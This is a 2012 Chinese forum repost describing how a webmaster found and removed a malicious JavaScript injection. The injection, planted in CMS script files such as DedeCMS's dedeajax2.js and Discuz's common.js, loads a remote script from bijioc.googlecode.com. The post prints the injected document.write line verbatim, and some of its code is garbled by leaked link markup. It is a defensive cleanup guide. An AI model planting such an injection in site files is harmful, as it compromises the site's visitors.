源码论坛,商业源码下载,尽在锦尚中国商业源码论坛

标题: 网站被恶意弹出bijioc.googlecode.com注入解决办法 [打印本页]

作者: mikel    时间: 2012-2-29 09:39
标题: 网站被恶意弹出bijioc.googlecode.com注入解决办法
刚刚发现自己的网站访问时,总是提示弹出一个SVN的窗口

上面的地址是 http://bijioc.googlecode.com/

看来是被恶意js注入了,

目前网站用的是dedecms,destoon的程序,于是百度一下,发现中招的还不少

原来是被在引用的js文件中注入了如下代码:
1        document.write(unescape("%3Cscript src='http://bijioc.googlecode.com/svn/trunk/js/navigatenormal.js?v="+(new Date().toDateString().replace(/\s/g, ''))+".js' type='text/<span class="wp_keywordlink_affiliate"><a href="http://www.mikel.cn/category/%e5%bc%80%e5%8f%91%e7%ac%94%e8%ae%b0/javascript" title="JavaScript" target="_blank">JavaScript</a></span>'%3E%3C/script%3E"));

下面说下我清理过程,首先还是打开我们网站的主页,依然是弹出那个可恶的窗口,关闭,然后用查看下网页源码没有发现异常,那是因为这段代码是利用js输出的,需要查看生成后的最终代码,可以利用firefox中的web developer插件中查看源代码中的查看处理后的源码项,就发现居然在头部引用了一个如下格式的js脚本:
1        <script type="text/<span class="wp_keywordlink_affiliate"><a href="http://www.mikel.cn/category/%e5%bc%80%e5%8f%91%e7%ac%94%e8%ae%b0/javascript" title="JavaScript" target="_blank">JavaScript</a></span>" src="static/js/common.js?9VJ"/>
2        <script type="text/<span class="wp_keywordlink_affiliate"><a href="http://www.mikel.cn/category/%e5%bc%80%e5%8f%91%e7%ac%94%e8%ae%b0/javascript" title="JavaScript" target="_blank">JavaScript</a></span>" src="static/js/common.js?9VJ">// <![CDATA[
3        <script type="text/javascript" src="http://bijioc.googlecode.com/svn/trunk/js/navigatebbs.js?v=WedFeb292012.js"/>

接下来就是查找被注入的js文件是哪个了,以上面的为例就是common.js文件了,以此类推,依次排查有问题的网站页面源码,只要寻找生成后的页面代码中存在bijioc.googlecode.com前面的js文件修改就行了,为了方便大家总结下我的网站被注入的dedecms的js路径是 /站点根目录/include/dedeajax2.js ;destoon的js路径是/站点目录/file/script/common.js; discuz的js路径/站点目录/static/js/common.js;

最后还要提醒大家及时修改ftp的密码和数据库密码,同时排查空间中是不是有木马程序,因为既然js文件被人修改说明网站的密码已经被人无限制,能够上场文件了,一定存在木马,要彻底清查。

转自:www.mikel.cn
作者: 2248740205    时间: 2012-5-15 22:48
4567
作者: 2248740205    时间: 2012-5-15 22:49
7675656576788990




欢迎光临 源码论坛,商业源码下载,尽在锦尚中国商业源码论坛 (https://bbs.52jscn.com/) Powered by Discuz! X3.3